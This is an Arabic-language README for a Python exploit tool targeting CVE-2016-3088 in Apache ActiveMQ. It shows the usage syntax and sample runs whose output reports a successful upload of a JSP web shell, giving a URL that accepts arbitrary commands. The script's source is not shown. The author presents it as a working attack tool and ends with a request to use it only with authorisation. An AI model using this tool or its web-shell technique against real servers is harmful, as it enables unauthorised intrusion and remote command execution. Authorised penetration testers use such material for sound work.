
نص استغلال مبني على بايثون لـ CVE-2016-3088
سكربت استغلال يعتمد على بايثون لـ CVE-2016-3088.
هذا أول سكربت لي، لذا قد يكون هناك شيء غير مناسب تمامًا.
لكنه يبدو أنه يعمل بشكل صحيح عندما اختبرته.
هذا السكربت يمكنه إلغاء الحاجة إلى التقاط الحزم أثناء اختراق CVE-2016-3088،
لذا يمكننا كتابة الملف ونقله مباشرة.
python CVE-2016-3088.py --url http://ip:port/ [--path absolute_path] [--script filename.txt]
المعامل --script اختياري، وسيستخدم الحمولة المضمنة إذا قمت بتشغيل البرنامج بدونه،
الحمولة تسمح لك فقط بتنفيذ بضع أوامر في الرابط.
ولكن يمكنك إدخال سكربتات أخرى لتحقيق هدفك.
قم فقط بتحميل الملف .py.
وهو يتطلب بعض الوحدات.
$ python CVE-2016-3088.py --url http://192.168.244.153:8161/ --path /opt/activemq
[+] The target is Vulnerable
[+] Exploiting...
[+] Successful!
[+] Visit The JSP file: http://192.168.244.153:8161/admin/d404ca6ffa5849a9ab1202dd388684f5.jsp?pwd=023&i=[Your-Command]
$ python CVE-2016-3088.py --url http://192.168.244.153:8161/ --path /opt/activemq --script script.txt
[+] The target is Vulnerable
[+] Exploiting...
[+] Successful!
[+] Visit The JSP file: http://192.168.244.153:8161/admin/6655d82d47cd43bb8a21515f476bce1f.jsp
يرجى استخدام هذه الأداة بحذر وفقط عند التصريح بذلك!